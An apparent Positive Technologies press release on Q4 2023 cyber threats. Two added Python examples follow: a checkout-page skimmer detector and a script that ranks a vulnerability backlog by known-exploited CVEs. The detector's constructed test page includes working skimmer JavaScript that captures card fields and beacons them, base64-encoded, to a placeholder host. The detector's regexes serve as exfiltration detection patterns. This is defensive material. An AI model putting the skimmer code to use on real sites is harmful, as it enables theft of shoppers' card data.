Positive Technologies: 73% of successful attacks on organizations employ malware

Positive Technologies analyzed the Q4 2023 cybersecurity threatscape. According to the study, three in four successful attacks on organizations in that period employed malware, and one in three attacks exploited existing vulnerabilities. Analysts also note that half of all successful attacks in Q4 2023 resulted in leakage of sensitive information, with an increasing proportion of bank card data.

The study reported a 19% increase in incidents in the fourth quarter of 2023 compared to the same period in 2022. Targeted attacks accounted for 78% of all successful cyberattacks. In addition to sensitive data leaks, the top consequences of successful attacks were disruption of core business operations for organizations (33%) and direct financial loss for individuals (30%).

Among successful attacks on organizations, the share that used malware rose from 45% in Q3 2023 to 73% in Q4. The three most common malware types were ransomware, spyware, and remote access trojans. Spyware attacks on organizations rose by five percentage points from the previous quarter; the analysts note that spyware was a trend throughout 2023.

Nearly a third (31%) of successful attacks on organizations involved exploitation of vulnerabilities. Notably, tens of thousands of devices were compromised through the critical vulnerability CVE-2023-20198 (CVSS score 10.0) in the web UI of the Cisco IOS XE operating system. Another prominent vulnerability was CVE-2023-4966 (Citrix Bleed, CVSS score 9.4), a session-token leak affecting Citrix NetScaler ADC and NetScaler Gateway; attackers exploited it against large companies including Boeing and the Chinese bank ICBC.

The analysts also noted an increase in attacks on water systems in Q4 2023. The hacktivist group Cyber Av3ngers escalated attacks on programmable logic controllers (PLCs) made by the Israeli manufacturer Unitronics, which are widely deployed at water utilities. Cyber Av3ngers claim to have hacked a dozen industrial water treatment plants in Israel and to have seized control of a pumping station in the U.S. state of Pennsylvania. A similar attack in Ireland left 180 households without water for two days. Ransomware operators also targeted water supply systems: a North Texas water utility, for example, was attacked by Daixin Team.

The share of payment card data in all information stolen in Q4 2023 grew compared to the previous quarter: from 3% to 5% in attacks on organizations and from 13% to 16% in attacks on individuals. Researchers attribute this growth to several large campaigns using JavaScript sniffers (web skimmers): malicious scripts injected into online stores that capture the bank card details customers enter on checkout pages and send them to attacker-controlled servers.

"It comes as no surprise that the number of attacks aimed at stealing the payment card data of online store customers increases around the holidays," says Yana Avezova, Senior Information Security Analyst at Positive Technologies. "One of the reasons why such attacks are successful is that people use outdated software. Attackers exploit vulnerabilities in outdated versions of CMS systems to inject malicious scripts into online store websites. Data obtained using JavaScript sniffers is later sold on the dark web. To avoid such leaks, we recommend shopping only at well-established online stores, using payment services that allow you to pay without entering your bank card details, having a separate card for online payments, and not keeping large sums of money on it."

Positive Technologies recommends that online store administrators regularly perform security assessments of their websites, update their CMS and plugins in a timely manner, and use strong passwords and multifactor authentication.
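A security assessment of a checkout page can start with a static check for the sniffer pattern described above: a script that reads card fields and then encodes or ships the values off-site, or a script loaded from a host the shop does not control. The following is an added example written for this page, not a Positive Technologies tool; the allowlist of trusted script hosts, the indicator regexes and both sample pages (a clean checkout and the same page with an injected skimmer) are constructed for illustration.

```python
"""Static scan of checkout-page HTML for JavaScript sniffer (web skimmer) indicators.

Added example: a heuristic triage script, not a Positive Technologies tool.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of hosts the shop legitimately loads scripts from.
TRUSTED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Indicator patterns: a script that touches card fields AND encodes or ships data out.
CARD_FIELD_RE = re.compile(r"card[_-]?number|ccnum|cvv|cvc|expir", re.I)
FORM_HOOK_RE = re.compile(r"addEventListener\(\s*['\"](submit|click|keyup|input|change)['\"]|onsubmit", re.I)
EXFIL_RE = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)
ENCODE_RE = re.compile(r"btoa\(|atob\(|String\.fromCharCode|unescape\(", re.I)


class _ScriptCollector(HTMLParser):
    """Collects (src, inline body, has integrity attribute) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._attrs = {}
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._attrs, self._buf = True, dict(attrs), []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append((self._attrs.get("src"), "".join(self._buf), "integrity" in self._attrs))


def scan_page(html, page_host):
    """Return (script_index, category, detail) findings for one page."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, (src, body, has_sri) in enumerate(parser.scripts):
        if src is not None:
            host = urlparse(src).hostname or page_host  # relative src is same-origin
            if host != page_host and host not in TRUSTED_SCRIPT_HOSTS:
                findings.append((idx, "external-script", f"script loaded from untrusted host {host}"))
            elif host != page_host and not has_sri:
                findings.append((idx, "missing-sri", f"third-party script from {host} lacks integrity"))
            continue
        signals = [name for name, rx in (("card-field", CARD_FIELD_RE), ("form-hook", FORM_HOOK_RE),
                                         ("exfil", EXFIL_RE), ("encoding", ENCODE_RE)) if rx.search(body)]
        # A validation script may read card fields; flag only when data also leaves the page.
        if "card-field" in signals and ("exfil" in signals or "encoding" in signals):
            findings.append((idx, "sniffer-indicators", "+".join(signals)))
    return findings


# Constructed sample: a clean checkout page (legitimate input-formatting script only).
CLEAN_PAGE = """<html><body>
<script src="https://cdn.shop.example/checkout.js" integrity="sha384-AAAA"></script>
<form id="checkout"><input name="cardnumber"><input name="cvv"><input name="expiry"></form>
<script>
document.querySelector("[name=cardnumber]").addEventListener("input", function (e) {
  e.target.value = e.target.value.replace(" ", "");
});
</script>
</body></html>"""

# Constructed sample: the same page after an injected skimmer (form hook + Image-beacon exfil).
SKIMMED_PAGE = CLEAN_PAGE.replace("</body>", """<script src="//stats-cdn.example/loader.js"></script>
<script>
(function () {
  document.querySelector("form#checkout").addEventListener("submit", function () {
    var d = [];
    ["cardnumber", "cvv", "expiry"].forEach(function (n) {
      d.push(n + "=" + document.getElementsByName(n)[0].value);
    });
    (new Image()).src = "//stats-cdn.example/i.gif?q=" + btoa(d.join("&"));
  });
})();
</script>
</body>""")

if __name__ == "__main__":
    print("clean:", scan_page(CLEAN_PAGE, "shop.example"))
    print("skimmed:", scan_page(SKIMMED_PAGE, "shop.example"))
```

The clean page produces no findings because its inline script reads a card field but never encodes or transmits anything; the skimmed page is flagged twice, once for the loader fetched from an untrusted host and once for the inline hook that base64-encodes the card fields into an image beacon. Heuristics like these catch the common pattern, not obfuscated variants, so treat them as a first filter before manual review of every script on the payment page.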

To protect against cyberattacks, experts also recommend that organizations choose software vendors and distributors carefully to minimize the risk of supply chain attacks. Strengthening vulnerability management processes and running bug bounty programs further improve security posture. First and foremost, organizations need to fix vulnerabilities that attackers are already exploiting and for which public exploits exist.
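The "exploited first" rule above is easy to state and easy to lose in a backlog sorted by CVSS alone. The following added example (written for this page, not a Positive Technologies or MaxPatrol routine) ranks scanner findings by whether the CVE is in a known-exploited catalogue, then by whether a public exploit exists, then by severity, with internet-facing assets ahead of internal ones at every tier. The catalogue excerpt mimics the shape of the CISA KEV JSON feed and names the two CVEs from the article; its other field values, the public-exploit set, the asset names and the CVE-0000-* identifiers are constructed placeholders.

```python
"""Rank a vulnerability backlog so actively exploited and publicly exploitable CVEs are fixed first.

Added example, not a Positive Technologies or MaxPatrol routine.
"""
import json
from dataclasses import dataclass

# Constructed excerpt in the shape of the CISA KEV JSON feed. The two CVE IDs are the
# ones named in the article; the remaining field values are placeholders.
KEV_FEED = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2023-20198", "vendorProject": "Cisco", "dueDate": "2023-10-20"},
    {"cveID": "CVE-2023-4966", "vendorProject": "Citrix", "dueDate": "2023-11-08"},
]})

# Constructed set of CVEs with a public exploit (e.g. taken from an exploit-database feed).
PUBLIC_EXPLOITS = {"CVE-2023-20198", "CVE-2023-4966", "CVE-0000-0001"}

TIERS = ("actively-exploited", "public-exploit", "critical-cvss", "backlog")


@dataclass(frozen=True)
class Finding:
    asset: str
    cve: str
    cvss: float
    internet_facing: bool


# Constructed scanner output; CVE-0000-* are placeholder identifiers, not real CVEs.
BACKLOG = [
    Finding("hr-laptop-17", "CVE-0000-0003", 7.5, False),
    Finding("web-shop", "CVE-0000-0004", 6.5, True),
    Finding("build-server", "CVE-0000-0002", 9.1, False),
    Finding("vpn-gw-2", "CVE-2023-4966", 9.4, True),
    Finding("intranet-cms", "CVE-0000-0001", 9.8, False),
    Finding("edge-router-1", "CVE-2023-20198", 10.0, True),
]


def load_kev(feed_json):
    """Map cveID -> KEV record for O(1) membership checks."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def tier(f, kev, public_exploits):
    """0 = in the exploited catalogue, 1 = public exploit, 2 = CVSS >= 9.0, 3 = everything else."""
    if f.cve in kev:
        return 0
    if f.cve in public_exploits:
        return 1
    if f.cvss >= 9.0:
        return 2
    return 3


def prioritize(findings, kev, public_exploits):
    """Sort key: tier, then internet-facing first, then CVSS descending, then asset name."""
    def key(f):
        return (tier(f, kev, public_exploits), not f.internet_facing, -f.cvss, f.asset)
    return [(f.asset, f.cve, TIERS[tier(f, kev, public_exploits)], kev.get(f.cve, {}).get("dueDate"))
            for f in sorted(findings, key=key)]


if __name__ == "__main__":
    for row in prioritize(BACKLOG, load_kev(KEV_FEED), PUBLIC_EXPLOITS):
        print(row)
```

Note that the CVSS 9.8 placeholder on the internal CMS outranks nothing in the exploited tier despite its higher score, while the CVSS 6.5 finding on the internet-facing shop moves ahead of the 7.5 finding on a laptop. Swap the constructed feed for the real KEV download and the exploit set for your scanner's exploit-availability flag and the same ordering applies.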

Experts also recommend using web application firewalls such as PT Application Firewall to harden the network perimeter. To protect devices from malware, a sandbox solution such as PT Sandbox can help by analyzing the behavior of files in a virtual environment. Vulnerability management systems (for example, MaxPatrol VM) enable cybersecurity teams to establish vulnerability management processes, while security information and event management systems (such as MaxPatrol SIEM) help detect security incidents in a timely manner. Advanced persistent threats can be discovered using a network behavior analysis solution such as PT Network Attack Discovery.